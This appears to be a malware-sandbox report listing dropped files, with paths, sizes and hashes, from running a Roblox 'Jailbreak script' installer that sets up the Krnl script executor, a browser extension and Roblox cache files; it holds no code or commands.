SHA512
f2876070ebd0975b00e0895186aa8ecd240ddcb15505ec93b211f3be7bfce3bfe8f176041d5f4ee276d1972111d65edcd1456847f624707058111815e3dcbee3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\RBX6BFB90E086AA4E47B61FF151DAC9F8F0
Filesize
91B

MD5
b04c0dc18c7d55cd67b193981117e8e5

SHA1
de1b8da5292626c82c5369243ab17e1fe87819e8

SHA256
0e9e0d48cb004bf17d389dc2d43451e7c45546210703bf2c36048568477f538a

SHA512
e6a2aea601a6cc021d9537fd56eaf034dbc5932f9dfeca57fa69921733af8d1c22fa4997a596f2895ca60a9a064ace6a135a8c5893381595521da9cdcfcfbef4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\RBX79490FA8DF784B4180920E1C6765FF7E
Filesize
91B

MD5
4ca3ba2874e2a5ee05f4d2de3f7e0bcc

SHA1
6b96ff5fd9347ea128735196305add8774e77d09

SHA256
587f1d1f2ecea864c38a733a696409bfcf9f95c721e4c279743e32b890c86ae6

SHA512
c9b09d27c26dcaef09e04c1171aade5c28da9ad24459ed67e6aa2e022aeb34cbb9b196922149a3923dc853ca8ac3246f300b064593e4b983d59b794c1cead957

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\RBX7C986F6868D14AC4A71CEF941B1C6886
Filesize
91B

MD5
5b430f520588781fbe9d4df156c1f2ad

SHA1
f29b6d2480116da857e43601f62af7d0d388b5c7

SHA256
88c01c9488bd316052a88a010e5c07381a4ff20bbd6aa84608ed7eeaca987f31

SHA512
9e0403b3ae4c93c3f7235d86f9977c28bb297d73fabb4bbdfc04f696c58add01b075301ddd1229dd26b424c8b5fe9c21482200602006fbe6e6faf7c5751d3440

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\RBX851D29AF813C44C2BA9983C7027AFA97
Filesize
91B

MD5
b0feb5ad35ddb11dd2c7586238d1cf39

SHA1
1718acfdf70d5a7ed9db917ca5364739d8b21b09

SHA256
0e7985056fd395aa70217bb42528ceb32682939d1483abafe97e31850d3f3799

SHA512
718a9f62a7f9e4de3801c22b19a9911a4514dc7782daf1f79c02c3753011a74f589653597ce9dff75484006f0b10abb74ce50ddedd0af5136ecac45148a19fd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\RBX9C814FCD942746A8BA8263676F68F6F7
Filesize
91B

MD5
7d38041c97321c9ec8be19743833a086

SHA1
60699941cdda6d4ad1d03a2c24f1974dbea82c28

SHA256
495e37e0e0db39c2e8dabce9e73c935f8da74225253d3e4871f1fe57f8ca2e5a

SHA512
509c5a7bea8a092828760b6f3ca490b4c129ff2fbe14eb88c942f62b35bb931ad30eec856547a760b61d97a8d044e11433afd326a6f1aa7ead2658d02bb039b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\RBXA5723DC617574CCA8F539B3BF3F4CB3A
Filesize
91B

MD5
f3af444cd46594375e19744711a93f33

SHA1
418776c8375db789fe801676106333e2c3d45d70

SHA256
74c004be22aaedf9433b1845fba7c6dd50aeb97805092f9b6d216b52ce3a41eb

SHA512
d99456b2447d41764cfc671d336c96b64edd2aac60d766e746056fcd36f4896a092abcc29da9f13a0d001efa1631c28b9ac4b1a2a92920156ceccf254127849c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\RBXB1795C924DE94546B73B287407D2ABE3
Filesize
91B

MD5
f10f7dec778ec29e2bea26b18cda487a

SHA1
d54dbc64f316650e0a73bf78d766501df5217d0b

SHA256
9ea09136d1707df5575eb75bcbad6e5cacf1ff364729f93ccf1fda7c21bc5ff3

SHA512
be38b82e162a55ba7e320153f202947d17f02ac011d044e4b15443e7d0ba4a3e667b00b277e6e57e9c300feab0947ad4bed511379c32899a8ac1570ad2d543fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\RBXC1FF891E175E4F0EB52504D21BBFA3FF
Filesize
91B

MD5
5d9cc07fc40f37f38708b08fe69c1b93

SHA1
cc72a91a98240c5bf2965818a5e90964e8674b14

SHA256
23bfac3425b032e6b35b59a711c8f502172a4d60e12b5fc0d008b1f626d7d0e9

SHA512
acd0afcde7842daa6d78430343484b05f0c91a824e822fb12185230888a87888151517298ee2525b1ee91721ceed893da53a54d8a50be25e55acc0d6106e0e7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\RBXDA974927117347E5AF74FBD65C0E9F36
Filesize
91B

MD5
934a11b8eaef18e6790e660f167b251b

SHA1
1195e4573af3ac1c966de8210b162d76f57df7e4

SHA256
8a8ffcca05368fdf6f8941aa5ebf50c565c4946e660dac731827703d5d36665a

SHA512
7b9ec190b7cbdaa40921a775beb6cc245f9e92b12785d0c1a9fc6285a996a809a2c80546a099fbdf5e2628404e4cedc2ab652f3e02c27012fd2fb3ea6d1ddaa1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\RBXF06B46523FB8427480D5F9277A66F089
Filesize
38KB

MD5
4741ecc9cd3a286fefe1c1a2e366a5c8

SHA1
41b4be5dd6a0a2189f7feb6388727c586925bf75

SHA256
9be86c3f75d83095cdaecf55b4db3e91d66b7b5c3e1ed70db4acb3c8f19c34f9

SHA512
6fd55123a50a9ef53df4d6148629b9495866b0a83524d7fe15fa0425ac2db46c6820991f3fcc6bf31489d8ae13047c6e5c15154d9f3270fd5364ae1456a61e6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\RBXF7EC0575E07B4ABEA3A7DCBBD18A912A
Filesize
91B

MD5
9de52d85b06da1acd48afa0d6d1d19aa

SHA1
6683b9c8eabeb1f315873fa6bcdfaaafa9353ad6

SHA256
8b231ef4bd7d12979f583d8c1b89c66ae7e379d6557a1bb6bfeffcafc15f1a2b

SHA512
f3c1210177102ad92dc8661720f12f4c6aed3a86991b59c823471464feb2eed41cc1512acc864cdace009852380701c20a694fdc0311d5a023c2b9298979c8fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\RBXFB2A5AA1357544AC82C080E5CD31DA55
Filesize
91B

MD5
18f468875dbc5f294617a4a04a6b85c8

SHA1
b10f43983276bbac1581c4c2f497288313659d13

SHA256
18a2b8ead525370e390bea9fcc80c5a08b12aec84185737869b9fca684db5004

SHA512
496b859cb244b11d926780ba5a10642a79815c453c647bd4743db1b9fe3809ed3bc5b91bfa1a6a4c8b4b469edd389481e6a10a5028e43372649a80c1981bacf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\af0005c4687e10c9e6500afc9b06d717
Filesize
9KB

MD5
d008c3ce114834ae1d12df486c81b085

SHA1
b7a32c26851104903340df5d01e5ab5c89195630

SHA256
090d8ecc616f4d3f3b20f85e2a72758f36460eeaa43051a1093eaffeff8c968e

SHA512
130676d47e848774cd04058e8b719614e70c9459abb61faf5529f15d320eb4455af80139e55bb1ba6dfe6b6e2a5c1e52f57c5c85a71539c9edce05dbb6ba6d94

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\bd2063305b3f205b0d8ab471f9cc7d3e
Filesize
13KB

MD5
ae1393910204be492605f97048966f9e

SHA1
5959017a975c9cc3ca7484032dad863bde74b8b8

SHA256
25bbd40966c8eaf83e8bfce2f0223b5d0487f09616cc60edb45a731478ddae12

SHA512
6f6b4dfcdbdec68209cdc5beb679ff86cfaea2453fed02e6f1940eeaeb5ad7a7a456330f75241e2c54a078eab5d4d8ff88be1dd4c268193fac07e90257233abc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\c7e2d1bc7bf438ac627272b1562e79ea
Filesize
5KB

MD5
3d743994083b8305fd9c50c6c8ee4b64

SHA1
f613d9dc17b814e61a98181bd34f96a30c70392d

SHA256
e14eea3ecb2f45fb027f3918b0f4e0d4e0be62d4fb9fdee3eb952d75b806fd3d

SHA512
6caa5f1bc37a09c9ed94570217a64787cb85ba0b8d66b68298e124cecfbbe5ecabf027a2ad3ffc4687e81655ced6e217d7a6486082934c972d29dfb6c56d2a1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\c81813ea34dbe699086525727806025a
Filesize
1.3MB

MD5
b2e96381cf4748e1b26c0b7aa20635d0

SHA1
d552f9a6297051c70d00f6d3bbfcffa9e2125110

SHA256
ec641ecd919ce6feb70ada9e86bea151f067cb496a929aa01c622abe9783053a

SHA512
c40fe060d15b2c1799313af8564ad93e0eeb8ba2ad0aece443eedc7a705431724d9aa738a6cc94f14070aa12065629512d6243963b51b6abb1c02240f1d2c353

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\ed509e3ea561ccd143e01643e13f1cc8
Filesize
243KB

MD5
32e38f6ca89ec8d20b950e8c4e6251a3

SHA1
33272755c2b02a87ecd916a5c5146d7455055606

SHA256
d8647239c00c5427650f26f8347a17b6686ee4673faff26aecade94b3cd70c0f

SHA512
5ff6139218f40d316eac19dc4512259f9093876a2c2a66b15be163e3cd3c1408fc30b956e3f62e158e785aa80c28b34f99defda18fededd0fe9a03b2609ddb2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\http\fea1bdab009c2f631a5372d4927860ea
Filesize
9KB

MD5
8b87be91d300ce1d36253189627d81fe

SHA1
ddb7ea76b930e4a693c6c1465340966731390c06

SHA256
d25c6114d4d3ae66431ea89491097db63cf151bd9f45e0198fb09d71dd3a09b8

SHA512
1f41f5657a62210d048c73cf86736c2bb269d1834d3a49e3ea23891627cddb8ae5467e1a316e7867c07bdbdd7a2ca9dfdf1aaf80920ef5daed380486ada47b52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Roblox\sounds\RBX990CCE68960449B4A4BD251663E5A337
Filesize
2.0MB

MD5
6e725263e1aaa49b5561e0d66f3c58f5

SHA1
d2321831b5089675158e4f42417f14540666817a

SHA256
82a483b20ce72565afc0ce869669814a1051ca7310c1266fed67e976addb2bfd

SHA512
16482056b36fe1d589baa5d6068d53b882906df0af912b2425c8e22be7fd11a9194ab6f9370e6111d2b5983d825aa4d38e5e105ca5c2d0eac014700c7c6b19be

Download Submit
C:\Users\Admin\AppData\Local\Temp\cacd1b6e-e4f1-46f2-850f-7949941fc8a4.tmp
Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-5RMA5.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-5RMA5.tmp\loader.gif
Filesize
3KB

MD5
d35d95fc6bd8be33d3ce5da2630b90bd

SHA1
be2fb4098a151f6c77a85ce8c274a3054a61178b

SHA256
dfa608be394c8f6d19aff352185917720f04072ac0412a8cab1174fec4939c08

SHA512
078fa3cf9c08c8bdaa554a52b153a159f537de3ee0ba923d64928cdd99b4f2528b4eb229c1b2352b946ef417efd478b453588a6cda1afc91b374e709afc730e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-5RMA5.tmp\side-logo.png
Filesize
24KB

MD5
e2d3022fb249af38288c47246bc60228

SHA1
bf7a44230ec7dc0f45e89224a6fe821d25f91f55

SHA256
9a7462e436d86f26ae9c0808b30810b8d2fd25ceef7af24ff09a1af32e63e2a9

SHA512
510d60ed51bc972b6bb3ac80a86d31b6d797a1af0a3ffce068089f0adf39d6591471de7ef7f21ecaccb67255e57bbe04786534256a12bcae5017078df56f12cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-5RMA5.tmp\zbShieldUtils.dll
Filesize
2.0MB

MD5
e1f18a22199c6f6aa5d87b24e5b39ef1

SHA1
0dcd8f90b575f6f1d10d6789fe769fa26daafd0e

SHA256
62c56c8cf2ac6521ce047b73aa99b6d3952ca53f11d34b00e98d17674a2fc10d

SHA512
5a10a2f096adce6e7db3a40bc3ea3fd44d602966e606706ee5a780703f211de7f77656c79c296390baee1e008dc3ce327eaaf5d78bbae20108670c5bc809a190

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-79PKI.tmp\Jailbreak script (1).tmp
Filesize
2.9MB

MD5
a93a63a9e371af57ae7ff4d3d1a8068c

SHA1
a0d8e6fd4975e3547d60daaadb17206b56677bf2

SHA256
e09808b81703ecc9af9bf588168da0eafbf84bf07b3e9cc57a22360af6b2e9f3

SHA512
f94f6629442c33576cd688e205b5df8a640de2ced7a595a7030f4e72965bcc4b3df6265e41b983a087e78f10b09132e5310ad1586bb51570860eb7f7b7eb94b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-P2I81.tmp\_isetup\_setup64.tmp
Filesize
6KB

MD5
e4211d6d009757c078a9fac7ff4f03d4

SHA1
019cd56ba687d39d12d4b13991c9a42ea6ba03da

SHA256
388a796580234efc95f3b1c70ad4cb44bfddc7ba0f9203bf4902b9929b136f95

SHA512
17257f15d843e88bb78adcfb48184b8ce22109cc2c99e709432728a392afae7b808ed32289ba397207172de990a354f15c2459b6797317da8ea18b040c85787e

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3596_102516916\CRX_INSTALL\images\icon128.png
Filesize
4KB

MD5
84aee254094f927b13c467ac6dec8883

SHA1
172a9c928a0be09c28ad56e2cdefb04cb1e2c163

SHA256
8bf08a798dae4543cadd035284795e43d7e5cf36d16f53ff51f5539ffb5aacd1

SHA512
86e600be8d811a58501fd2028dc6f2f998c05de1a7200c55068b0b87c1ba9805786028a5de40fde78ffac0f1f576d2858340fd4ef43e01528b5647b0337d42a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3596_102516916\CRX_INSTALL\images\icon16.png
Filesize
1KB

MD5
e5bf9f8cf705fabdd36d73d27d791fd4

SHA1
280fe67d010d0758db3878c1d4c3fb4b952eb714

SHA256
23f65937093bb2c47eef1574d48e8ffa69854f60976acadf9bac0eb6abfcea0a

SHA512
71504ae61f056fb55a5fc4e49adde7b0b452d8d11f1b12dc1bd3db61267e7d6a64a369c3dc4225d47f57cefa8c2778a20155b6ea60311af1d6cfe1a277ff59a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3596_102516916\CRX_INSTALL\images\icon32.png
Filesize
2KB

MD5
8c237391d129c599650b96328f549f3b

SHA1
9edc6a98294a923fb2a7f314700321bb4a73e28f

SHA256
08f2f02f02de3c39a4298b5c1cc57df8e1bc81e6b373216e12acc477baccd184

SHA512
679f6a86551177f74587a0f9280cccd8171c3326a0673655c1c5cb3de3e8d72a360cd91b9e17d0b1dc983e530e67b898a4e844c6346d3fff682f69c52a527e1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3596_102516916\CRX_INSTALL\images\icon48.png
Filesize
3KB

MD5
f77d088f3f9fc668e98fa263dbd2de59

SHA1
3dd44b6168fe7386f6787ef751414eac1f05deb5

SHA256
35efdccd3e917e0e1b09cc920e70ba628ed8d8ec082f1bd65e8cecf0794ac27d

SHA512
43e1737fc82b35ddf87fa0f61c34af660dabb3e21ab6b1abd23cadb16e10ec49322991ac922d353e5a3a10faa1f614b53b7c081f7c0927a64ea90c8a73a26c5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3596_102516916\CRX_INSTALL\manifest.json
Filesize
1KB

MD5
1cca4ed2be20ba47905bff74a9190592

SHA1
8a32a73e312b95447272ef479591094ea3a0f5df

SHA256
e34a1b5fcaa9c4a8443bd2961150b62275914c086da66d30dfe0ab39ef680fc1

SHA512
1489422151171675bf8573202d74fca16de6f7146be9a6b6e69b2244e974e91bdb08a940657e7e5a0c36068dc62ad7e78a7e179c7ec1e7661680127ee4076153

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3596_102516916\CRX_INSTALL\src\background.js
Filesize
69B

MD5
475e046ecf4c35e24a90381a8ed27fd8

SHA1
fc7523ff96eab745fe020cdba4ebdcbbabae32a1

SHA256
901b8e290e00dea4df67e270f20a7e02cf37ee4dcd861ad2df9ed82c51011a75

SHA512
dc7e27620fa3b1f4e1c0a9a8e92d5a6c28f66300d29bc47c5679f47eb692c66c46c4de345c849ccdf48f26a60b152356e5a38e05e0a8b0a02957f6e56b5ceb91

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3596_102516916\CRX_INSTALL\src\jquery-3.5.1.min.js
Filesize
87KB

MD5
dc5e7f18c8d36ac1d3d4753a87c98d0a

SHA1
c8e1c8b386dc5b7a9184c763c88d19a346eb3342

SHA256
f7f6a5894f1d19ddad6fa392b2ece2c5e578cbf7da4ea805b6885eb6985b6e3d

SHA512
6cb4f4426f559c06190df97229c05a436820d21498350ac9f118a5625758435171418a022ed523bae46e668f9f8ea871feab6aff58ad2740b67a30f196d65516

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Community\Cmdx\card.config
Filesize
12B

MD5
773229091774b2b77583da0f15a718ac

SHA1
fcdbebdefc85658d65e23dcc52cd1a3ae9a12ee3

SHA256
f70e955a67aad2ee28ac0c8b1c0882c9bd9991da51b87b224a4e22eefb8956f9

SHA512
7762bbbc14bdc679c51b5d9b75b1c19b0977d70c98a1edcbceaa950e7ba42c991ae4e81768a9bd80bb1bb2bd1eed4e6a18e98e16a2ec974464850d9c14a9fc2b

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Community\Cmdx\preview.png
Filesize
155KB

MD5
971fcb67b3ed9746cfd5c12032c8f54a

SHA1
378d56a2909c9b4dacc1a679664de7a3b9b48109

SHA256
94d47c3270fd8af9431722aac704778dd0e157fcffe7e24435a25368272e6bfc

SHA512
3d5e2f7112462049cd84fabce244cd51cbc341e8adc4fa27e5516855dd6f1d9727d6dde463812f6c552a732ebb2dad87ea6eed38a9bf7a1ea55800068fecfa63

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Community\Cmdx\profile.png
Filesize
7KB

MD5
fe0cf96f57839cdd21191af66c241b96

SHA1
fba1b795f839c0fbaa4e47dfd9ad79ac6c2a4562

SHA256
bafaba91b68e495a6946cfae26a1f194dd8e556c1fb28dcf1e220721eb0ecbfc

SHA512
5adf6c8fc4b24f5af253c0f03c5b57ac7243008765b3854ed4b83d758a1901997ff4e6d9e0e1918383bce19832b72fc68cc7005c8a53a329df41b2ad91162ce9

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Community\Cmdx\script.lua
Filesize
1KB

MD5
4417aa7a7b95b7e9d91ffa8e5983577c

SHA1
367b923829db8fecf2c638fb500f161d22631715

SHA256
eafd7bc4f8aeacd998f6ffa38c8fc2ec2fb043ca97c956a0949aebb9bbbdbbe6

SHA512
04a5f440a6e00ea0aa8491ae4c6dd6aa68f704db54a43a5d6bf4c99446ae2c7792be8dcaee6542a93280eb35dc93acb60e8e4065f13c885e4186d80824feb04e

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Community\DomainX\preview.png
Filesize
534KB

MD5
1ea0fccbceecbcfbe9c57bf230241889

SHA1
4b538297c419731bed21e7f0f8c1f921c6c3f389

SHA256
79eb0dcb2cff8cb7a620fa87284fdf79a1bfd97690d193c8caa15ffa3068c9cd

SHA512
6229d6084be3f3368a98ffa4b0aaa5899fdd85d5dd2f538987a8abce2bf1d3c378731c1b1b37e2d555e47d8812f8b5e8fef0d68241dfbf2c8952ffb1737a6909

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Community\DomainX\profile.png
Filesize
19KB

MD5
be676e5468366d6f34839bab1a2be5dd

SHA1
14424fc881b910a406f364d1dffb22ee0dc28e04

SHA256
196c3db248754cab84491e35496aa7d2dbd93bd1f1dce0b20462c2310b13265e

SHA512
3e87468cd2fd4669a59f2a18a4a968a32414ea788eaee0f341b93387b852fcab3c0d4c5fa6a29f884520b6fa10916b39eb7791e82bc951355378356955bf2ca7

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Data\7z.NET.dll
Filesize
15KB

MD5
982475050787051658abd42e890a2469

SHA1
d955e35355e33a9837d00e78c824f6e5792b47f3

SHA256
4e193ccda4ef7ec7fc1bc12d7abba225a9af5b4612aa0b67a02324b9da8b268c

SHA512
c97b40c82499759e8a11b581004252be618f967153b5a9ce425f9a385746f3a1bdc467686023f36ed11212ea23e1c6b03b4df32cc5dd2a8c4b1d4ab23541c1f6

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Data\7z.NET.dll
Filesize
15KB

MD5
982475050787051658abd42e890a2469

SHA1
d955e35355e33a9837d00e78c824f6e5792b47f3

SHA256
4e193ccda4ef7ec7fc1bc12d7abba225a9af5b4612aa0b67a02324b9da8b268c

SHA512
c97b40c82499759e8a11b581004252be618f967153b5a9ce425f9a385746f3a1bdc467686023f36ed11212ea23e1c6b03b4df32cc5dd2a8c4b1d4ab23541c1f6

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Data\7za.exe
Filesize
628KB

MD5
ec79cabd55a14379e4d676bb17d9e3df

SHA1
15626d505da35bfdb33aea5c8f7831f616cabdba

SHA256
44a55f5d9c31d0990de47b9893e0c927478930cef06fbe2d1f520a6d6cba587d

SHA512
00bbb601a685cbfb3c51c1da9f3b77c2b318c79e87d88a31c0e215288101753679e1586b170ccc9c2cb0b5ce05c2090c0737a1e4a616ad1d9658392066196d47

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Data\7za.exe
Filesize
628KB

MD5
ec79cabd55a14379e4d676bb17d9e3df

SHA1
15626d505da35bfdb33aea5c8f7831f616cabdba

SHA256
44a55f5d9c31d0990de47b9893e0c927478930cef06fbe2d1f520a6d6cba587d

SHA512
00bbb601a685cbfb3c51c1da9f3b77c2b318c79e87d88a31c0e215288101753679e1586b170ccc9c2cb0b5ce05c2090c0737a1e4a616ad1d9658392066196d47

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Data\7za.exe
Filesize
628KB

MD5
ec79cabd55a14379e4d676bb17d9e3df

SHA1
15626d505da35bfdb33aea5c8f7831f616cabdba

SHA256
44a55f5d9c31d0990de47b9893e0c927478930cef06fbe2d1f520a6d6cba587d

SHA512
00bbb601a685cbfb3c51c1da9f3b77c2b318c79e87d88a31c0e215288101753679e1586b170ccc9c2cb0b5ce05c2090c0737a1e4a616ad1d9658392066196d47

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Data\Community.7z
Filesize
2.2MB

MD5
e7e69e3bb82e50d10e17fceb8851f1e3

SHA1
ac38d2c834b5ef30feb0b23272ee289779caf14c

SHA256
1f70e675fd69fa7d0efe44a2a6cbade8350ebb1cb3a9a18ff824cfd680b35ddd

SHA512
ba44f453d75ac413f404b89c5dfd1acbdf95aae10beb65599e7e52ecec7eb3ea82b95a6947fcda38e2cb878eb197714be3f3e3d93d5fc09e83ebb952117ded44

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Data\SavedTabs\Untitled\tab.config
Filesize
16B

MD5
ff886f43b6ee40cee882df7c664ab787

SHA1
98a2823c0d6254e6091fcc07eb650325632dc75c

SHA256
b5cfe3edaaa58a1d0c05cb78bf5acbbacf41701b38c268cb83e2e2026aec01a9

SHA512
48211e831064f00f0538effcbd4cfc4f5204b5e6c98ddaaa64e6fd83fda32976df51e555af3187f5bb420ee5d7f1488659da1746aba7eae574b916410ee8ac64

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Data\SavedTabs\tabs.config
Filesize
8B

MD5
911af7aa209e00b49f3d6fd2afa92564

SHA1
621521f9a8788695ec292cbec54d2792cfdf0a7d

SHA256
f59ab8d1331b7b16952fbd388258f856b9e09ce2d7b904f500bdfe4905640774

SHA512
de46c8852eca652e4a50bc9701ca0d8da7381420b112d1532750eac26a22d87d5bd215eadf3d9d6831bb217eba0ff7fff2749a34a58253e3297e312d2641a925

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Data\krnl.config
Filesize
48B

MD5
2bf7b0f0d0485173c85ed257a7c2e8b4

SHA1
8f26700ad7fbb841ba2a49fe4ab93f791b1ce230

SHA256
6375b1b30e8efe5af82ce1fd0a1e62fad45e0c9cef226c00d32b945350d0c686

SHA512
b61b8462673e0900425a0ddcbf1e6b5b8dfbbf8d8ff18dbf3f9b1dddd66a4ccccdf688236921605d5f673de49a951ab12d8d8b98d86b4f284a37304ce8ec4b63

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\GPUCache\data_1
Filesize
264KB

MD5
d0d388f3865d0523e451d6ba0be34cc4

SHA1
8571c6a52aacc2747c048e3419e5657b74612995

SHA256
902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

SHA512
376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\KrnlUI.exe
Filesize
1.1MB

MD5
39ed86952a1e7926924a18802c0b75e4

SHA1
e7ad2a51e62fe68b1a82b17bcde347ab38c09ca3

SHA256
b84ceb86e9a8eba4d168f2cc6c9010c93779641e595f900aafe8cfef6165c126

SHA512
fe7b93af9bb2621148154389e6c7e1dca54c426df88fd09eab9b33763584a4eee837995d29f7dc1550acc4643c05f03a28b5a25e7019d7a4ceb70c238ae33bad

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\KrnlUI.exe
Filesize
1.1MB

MD5
39ed86952a1e7926924a18802c0b75e4

SHA1
e7ad2a51e62fe68b1a82b17bcde347ab38c09ca3

SHA256
b84ceb86e9a8eba4d168f2cc6c9010c93779641e595f900aafe8cfef6165c126

SHA512
fe7b93af9bb2621148154389e6c7e1dca54c426df88fd09eab9b33763584a4eee837995d29f7dc1550acc4643c05f03a28b5a25e7019d7a4ceb70c238ae33bad

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\KrnlUI.exe.config
Filesize
438B

MD5
909df77c711b4133a8f8560483ec2bb3

SHA1
8df8505ec0a0dd670b4044c641e772f6ded485a1

SHA256
c49ed8da5765f33cc854cf13ee0c33ed65d4eba6843c24d05e321e3b40f4a68c

SHA512
0547bae72cd75ad753ddd95c12b7a42b8b3285a3384925cf738c4cc6835c6dd21d16a6206662c4a723fcf348da7e62db3585564782c7daad49b765b43accb28d

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.Core.dll
Filesize
908KB

MD5
9aa41e58b0ceded6442c54e93cc279dc

SHA1
76b3622d8bd5c0ab88d2a6422866e8b572afb318

SHA256
a3ec829be118703645ebadde46a13d8aecc08291567314652e81ebc163ea8f0d

SHA512
ba24aac25bf61898e924cbf049a44e45dd996308b2caedce91978b67f4bb1accfc98860610ff0a5469fe5dd5e34c2a87bee1e8930d4019d3139bcab89552b3bf

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.Core.dll
Filesize
908KB

MD5
9aa41e58b0ceded6442c54e93cc279dc

SHA1
76b3622d8bd5c0ab88d2a6422866e8b572afb318

SHA256
a3ec829be118703645ebadde46a13d8aecc08291567314652e81ebc163ea8f0d

SHA512
ba24aac25bf61898e924cbf049a44e45dd996308b2caedce91978b67f4bb1accfc98860610ff0a5469fe5dd5e34c2a87bee1e8930d4019d3139bcab89552b3bf

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.Core.dll
Filesize
908KB

MD5
9aa41e58b0ceded6442c54e93cc279dc

SHA1
76b3622d8bd5c0ab88d2a6422866e8b572afb318

SHA256
a3ec829be118703645ebadde46a13d8aecc08291567314652e81ebc163ea8f0d

SHA512
ba24aac25bf61898e924cbf049a44e45dd996308b2caedce91978b67f4bb1accfc98860610ff0a5469fe5dd5e34c2a87bee1e8930d4019d3139bcab89552b3bf

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.Core.dll
Filesize
908KB

MD5
9aa41e58b0ceded6442c54e93cc279dc

SHA1
76b3622d8bd5c0ab88d2a6422866e8b572afb318

SHA256
a3ec829be118703645ebadde46a13d8aecc08291567314652e81ebc163ea8f0d

SHA512
ba24aac25bf61898e924cbf049a44e45dd996308b2caedce91978b67f4bb1accfc98860610ff0a5469fe5dd5e34c2a87bee1e8930d4019d3139bcab89552b3bf

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe
Filesize
7KB

MD5
5f7e54710987e30dfca1e90c2063402d

SHA1
3917a469d1516efe34f275b5f31a83227cd14694

SHA256
2b44d738767dc991b0f8cbf3832190de9c1670da929e28e8073a88033f9548af

SHA512
b9ae359ae2a2f833aab10d3399b3620b0ef24482fdb398c8a3794f2fbba3329ef94227a200cf63c064bab18779ea56cd940159279a5ba2ae7f65bec5403fef4e

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe
Filesize
7KB

MD5
5f7e54710987e30dfca1e90c2063402d

SHA1
3917a469d1516efe34f275b5f31a83227cd14694

SHA256
2b44d738767dc991b0f8cbf3832190de9c1670da929e28e8073a88033f9548af

SHA512
b9ae359ae2a2f833aab10d3399b3620b0ef24482fdb398c8a3794f2fbba3329ef94227a200cf63c064bab18779ea56cd940159279a5ba2ae7f65bec5403fef4e

